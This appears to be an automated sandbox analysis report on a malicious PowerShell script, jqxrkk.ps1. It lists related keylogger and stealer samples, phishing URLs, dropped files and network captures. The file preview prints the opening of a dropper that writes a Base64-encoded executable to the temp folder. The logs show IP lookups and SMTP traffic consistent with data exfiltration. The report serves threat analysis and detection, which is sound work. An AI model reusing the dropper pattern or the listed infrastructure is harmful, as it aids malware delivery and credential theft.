	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.96.1
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	104.21.48.1
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	193.122.6.168
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	0V2JsCrGUB.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.38.84
	https://boutiquedumonde.instawp.xyz/wp-content/themes/twentytwentyfive/envoidoclosa_toutdomaine/wetransfer/index.html	Get hash	malicious	Unknown	Browse	1.1.1.1
	drop1.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	Fantazy.x86_64.elf	Get hash	malicious	Unknown	Browse	1.3.115.13
	https://sora-ai-download.com/	Get hash	malicious	Unknown	Browse	104.22.20.144
	ReIayMSG__polarisrx.com_#7107380109.htm	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	Appraisal-nation-Review_and_Signature_Request46074.pdf	Get hash	malicious	Unknown	Browse	104.26.5.30
	ReIayMSG__polarisrx.com_#6577807268.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Appraisal-nation-Review_and_Signature_Request46074.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	104.21.32.1
UTMEMUS	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.8.169
	fiyati_teklif 615TBI507_ ACCADO san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fatura098002.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN	telnet.ppc.elf	Get hash	malicious	Unknown	Browse	203.162.81.0
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	222.255.236.245
	https://membership.garenaa.id.vn/css/greeting.jsp/index.html	Get hash	malicious	Unknown	Browse	203.162.56.72
	http://ff.members.gerane.vn/	Get hash	malicious	Unknown	Browse	203.162.56.72
	http://memberships.garenna.id.vn/css/hitcount.jsp	Get hash	malicious	Unknown	Browse	203.162.56.72
	file.exe	Get hash	malicious	SystemBC	Browse	222.255.235.113
	Ng11aTxsp8.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	123.30.128.169
	52fkd1Rd8E.elf	Get hash	malicious	Mirai	Browse	203.162.81.4
	UQqIEFBoFN.elf	Get hash	malicious	Mirai	Browse	203.162.81.9
	DNTT-v3.1.xlsb.xlsx	Get hash	malicious	Unknown	Browse	222.255.103.91

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.16.1
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	CTM REQUEST-ETD JAN 22, 2024_pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Copy shipping docs PO EV1786 LY ECO PAK EV1.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	Payment 01.08.25.pdf.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	December Reconciliation QuanKang.exe	Get hash	malicious	Unknown	Browse	104.21.16.1
	JB#40044 Order.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	PO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1

Process:	C:\Users\user\AppData\Local\Temp\x.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulbtI/llh:NllUGt
MD5:	A2FA6893E23DC54E7B37910FF7A39E91
SHA1:	28B1D6865C49F8F08051DFB8B855177064035480
SHA-256:	1B6E4AD9FBE44E46DB569F77AB07069955CAF781A4644F8BB7FBFE9118262AC4
SHA-512:	67DE29491B5837B5324D8AD6BA978992FEE7F08B42F37FF61371DD3D50FD792C03B24C6DFA82CAF3BB30ACE4119BA3CB17E9CA2E47F3F1BAFCAE9F57CE4DA6EA
Malicious:	false
Reputation:	low
Preview:	@...e...................................-............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yzksvw1.04c.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bxcbnnbs.ryi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\x.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	139776
Entropy (8bit):	7.644817742072604
Encrypted:	false
SSDEEP:	3072:7tunZcvnVDr29cusZ67AJRDfmeTTlWhgnTf1qfUqnp07Kz7W:7tunZcvnVnB67UfmSimTfoMqnp07Kz
MD5:	9FB7455B1C6CB563FF7E58F422F3BC6E
SHA1:	B0EAAE8C4727FF2A6F0F288EA56D49E5B700C54A
SHA-256:	6E2D33CE0C4A7216F96AB98BCF2DBE18CDBF13A1C9BB011C52767A86858403B3
SHA-512:	702D9C99B0D63090531D77F3C6F251EA6D87179AC0616861EA70AB983B0101361C6DD90392B049AC8E4730B9626122380125C4740516C045CE21DB3743D05B18
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....w..........."...0..~...........`....... ....@.. ....................................`.....................................W....@...............................................................................`..................H............6Fd:c#.D.... ......................@....text....{.......\|.................. ..`.rsrc........@......................@..@.............`...................... ..`.reloc............... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7313500215832454
Encrypted:	false
SSDEEP:	48:hBD5lBtRb33CywU2URqeukvhkvklCywGlRTWHtlHJySogZoWFRTWHtluySogZoC1:XRD3COTSkvhkvCCti4HtfHZ4HtKH1
MD5:	8E4C420BD4519E81B5A5DB2E786FB573
SHA1:	B87395D299B54DE461F58781A609CE681BC15E8A
SHA-256:	B5C52BE5EACD8D1CA369A046420F620E5D9057B44DF98CD19CE2BEDC788B2246
SHA-512:	1ACEDDD6A57CE10969A8D2BDEBA40772CEC0053344B7A359683C341944E738C5F1BA0D1180556CDF887981F60FA1FAC6C2B6489B25A9B30CD0FACC3C013E270B
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S...:....b..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...gvJ..b..T....b......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2)Z$............................^.A.p.p.D.a.t.a...B.V.1.....)Z"...Roaming.@......EW<2)Z"...../.......................O.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2)Z......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2)Z......2......................N>.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2)Z......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2)Z......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2)Z&.....u...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ML1W4V45D12ZJBQ4EM4W.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6224
Entropy (8bit):	3.7313500215832454
Encrypted:	false
SSDEEP:	48:hBD5lBtRb33CywU2URqeukvhkvklCywGlRTWHtlHJySogZoWFRTWHtluySogZoC1:XRD3COTSkvhkvCCti4HtfHZ4HtKH1
MD5:	8E4C420BD4519E81B5A5DB2E786FB573
SHA1:	B87395D299B54DE461F58781A609CE681BC15E8A
SHA-256:	B5C52BE5EACD8D1CA369A046420F620E5D9057B44DF98CD19CE2BEDC788B2246
SHA-512:	1ACEDDD6A57CE10969A8D2BDEBA40772CEC0053344B7A359683C341944E738C5F1BA0D1180556CDF887981F60FA1FAC6C2B6489B25A9B30CD0FACC3C013E270B
Malicious:	false
Preview:	...................................FL..................F.".. ...J.S...:....b..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...gvJ..b..T....b......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2)Z$............................^.A.p.p.D.a.t.a...B.V.1.....)Z"...Roaming.@......EW<2)Z"...../.......................O.R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2)Z......0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2)Z......2......................N>.W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2)Z......5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2)Z......6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2)Z&.....u...........

Static File Info

General

File type:	ASCII text, with very long lines (65494), with CRLF line terminators
Entropy (8bit):	5.916802219473977
TrID:
File name:	jqxrkk.ps1
File size:	186'488 bytes
MD5:	32da6ee3b90b2d2f694b8635dfa58459
SHA1:	9272ee959d8290d6f4095fd6525c7927b5c92de0
SHA256:	00a6cd51b0d8ca285eea43383a0736a9c4b95ed381fb5607291d08dc9870e30f
SHA512:	be827eeb5cb31c5126696577a54d52e26391ec843d36cbab5c369c908eca52115192db73825c0fceefeabe5fe98b823545451cb7b6859998af4325da0cd1c173
SSDEEP:	3072:NlbgeXDOEpoKxKjtT0eIfGUQteCmpqLtSX9bun6CPh+G6K45I:/bg6BKdtTfIfGZ4rpGsNbuL+xa
TLSH:	A1046B318808B52FCEEF2F8BA4502FC37C79253BDE551019A44F59B96E28639593BF24
File Content Preview:	$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-09T18:33:19.476114+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49712	132.226.8.169	80	TCP
2025-01-09T18:33:26.038692+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49712	132.226.8.169	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 18:33:18.324382067 CET	49712	80	192.168.2.6	132.226.8.169
Jan 9, 2025 18:33:18.329176903 CET	80	49712	132.226.8.169	192.168.2.6
Jan 9, 2025 18:33:18.329369068 CET	49712	80	192.168.2.6	132.226.8.169
Jan 9, 2025 18:33:18.329560041 CET	49712	80	192.168.2.6	132.226.8.169
Jan 9, 2025 18:33:18.334306002 CET	80	49712	132.226.8.169	192.168.2.6
Jan 9, 2025 18:33:19.158149004 CET	80	49712	132.226.8.169	192.168.2.6
Jan 9, 2025 18:33:19.162092924 CET	49712	80	192.168.2.6	132.226.8.169
Jan 9, 2025 18:33:19.167382956 CET	80	49712	132.226.8.169	192.168.2.6
Jan 9, 2025 18:33:19.424876928 CET	80	49712	132.226.8.169	192.168.2.6
Jan 9, 2025 18:33:19.450393915 CET	49723	443	192.168.2.6	104.21.16.1
Jan 9, 2025 18:33:19.450414896 CET	443	49723	104.21.16.1	192.168.2.6
Jan 9, 2025 18:33:19.450658083 CET	49723	443	192.168.2.6	104.21.16.1
Jan 9, 2025 18:33:19.459094048 CET	49723	443	192.168.2.6	104.21.16.1
Jan 9, 2025 18:33:19.459105015 CET	443	49723	104.21.16.1	192.168.2.6
Jan 9, 2025 18:33:19.476114035 CET	49712	80	192.168.2.6	132.226.8.169
Jan 9, 2025 18:33:19.951972961 CET	443	49723	104.21.16.1	192.168.2.6
Jan 9, 2025 18:33:19.952064037 CET	49723	443	192.168.2.6	104.21.16.1
Jan 9, 2025 18:33:19.961374044 CET	49723	443	192.168.2.6	104.21.16.1
Jan 9, 2025 18:33:19.961395979 CET	443	49723	104.21.16.1	192.168.2.6
Jan 9, 2025 18:33:19.961889029 CET	443	49723	104.21.16.1	192.168.2.6
Jan 9, 2025 18:33:20.007194042 CET	49723	443	192.168.2.6	104.21.16.1
Jan 9, 2025 18:33:20.064730883 CET	49723	443	192.168.2.6	104.21.16.1
Jan 9, 2025 18:33:20.111335039 CET	443	49723	104.21.16.1	192.168.2.6
Jan 9, 2025 18:33:20.218558073 CET	443	49723	104.21.16.1	192.168.2.6
Jan 9, 2025 18:33:20.218640089 CET	443	49723	104.21.16.1	192.168.2.6
Jan 9, 2025 18:33:20.218689919 CET	49723	443	192.168.2.6	104.21.16.1
Jan 9, 2025 18:33:20.229182959 CET	49723	443	192.168.2.6	104.21.16.1
Jan 9, 2025 18:33:25.397774935 CET	49712	80	192.168.2.6	132.226.8.169
Jan 9, 2025 18:33:25.403388977 CET	80	49712	132.226.8.169	192.168.2.6
Jan 9, 2025 18:33:25.988481998 CET	80	49712	132.226.8.169	192.168.2.6
Jan 9, 2025 18:33:26.038691998 CET	49712	80	192.168.2.6	132.226.8.169
Jan 9, 2025 18:33:26.818523884 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:26.823400974 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:26.823466063 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:28.794415951 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:28.794665098 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:28.799467087 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:29.439461946 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:29.441792011 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:29.446665049 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:29.787869930 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:29.788453102 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:29.793245077 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.144085884 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.144098997 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.144156933 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:30.144346952 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.144367933 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.144515991 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.144526005 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.144541979 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:30.144578934 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:30.232614040 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.249856949 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:30.254678965 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.623406887 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:30.628904104 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:30.633749962 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:31.032464981 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:31.033575058 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:31.038454056 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:31.398328066 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:31.399862051 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:31.404722929 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:32.118565083 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:32.118905067 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:32.125387907 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:32.548465967 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:32.548751116 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:32.553561926 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:32.918554068 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:32.918768883 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:32.923616886 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:33.350972891 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:33.351803064 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:33.351880074 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:33.351900101 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:33.351959944 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:33:33.356611967 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:33.356774092 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:33.356894970 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:33.356904984 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:35.325634003 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:33:35.366621017 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:34:16.085796118 CET	49712	80	192.168.2.6	132.226.8.169
Jan 9, 2025 18:34:16.108520985 CET	80	49712	132.226.8.169	192.168.2.6
Jan 9, 2025 18:34:16.108592987 CET	49712	80	192.168.2.6	132.226.8.169
Jan 9, 2025 18:35:06.101583004 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:35:06.106657982 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:35:06.447840929 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:35:06.447869062 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:35:06.447947025 CET	587	49762	123.30.244.30	192.168.2.6
Jan 9, 2025 18:35:06.448003054 CET	49762	587	192.168.2.6	123.30.244.30
Jan 9, 2025 18:35:06.448502064 CET	49762	587	192.168.2.6	123.30.244.30

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 18:33:18.309952974 CET	51497	53	192.168.2.6	1.1.1.1
Jan 9, 2025 18:33:18.316601992 CET	53	51497	1.1.1.1	192.168.2.6
Jan 9, 2025 18:33:19.441416979 CET	62338	53	192.168.2.6	1.1.1.1
Jan 9, 2025 18:33:19.449714899 CET	53	62338	1.1.1.1	192.168.2.6
Jan 9, 2025 18:33:25.998871088 CET	57793	53	192.168.2.6	1.1.1.1
Jan 9, 2025 18:33:26.815812111 CET	53	57793	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 18:33:18.309952974 CET	192.168.2.6	1.1.1.1	0x4e1b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:19.441416979 CET	192.168.2.6	1.1.1.1	0x33f8	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:25.998871088 CET	192.168.2.6	1.1.1.1	0x368c	Standard query (0)	mail.phobinh.com.vn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 18:33:18.316601992 CET	1.1.1.1	192.168.2.6	0x4e1b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 18:33:18.316601992 CET	1.1.1.1	192.168.2.6	0x4e1b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:18.316601992 CET	1.1.1.1	192.168.2.6	0x4e1b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:18.316601992 CET	1.1.1.1	192.168.2.6	0x4e1b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:18.316601992 CET	1.1.1.1	192.168.2.6	0x4e1b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:18.316601992 CET	1.1.1.1	192.168.2.6	0x4e1b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:19.449714899 CET	1.1.1.1	192.168.2.6	0x33f8	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:19.449714899 CET	1.1.1.1	192.168.2.6	0x33f8	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:19.449714899 CET	1.1.1.1	192.168.2.6	0x33f8	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:19.449714899 CET	1.1.1.1	192.168.2.6	0x33f8	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:19.449714899 CET	1.1.1.1	192.168.2.6	0x33f8	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:19.449714899 CET	1.1.1.1	192.168.2.6	0x33f8	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:19.449714899 CET	1.1.1.1	192.168.2.6	0x33f8	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 18:33:26.815812111 CET	1.1.1.1	192.168.2.6	0x368c	No error (0)	mail.phobinh.com.vn	mail24430.maychuemail.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 18:33:26.815812111 CET	1.1.1.1	192.168.2.6	0x368c	No error (0)	mail24430.maychuemail.com		123.30.244.30	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	132.226.8.169	80	1280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 18:33:18.329560041 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
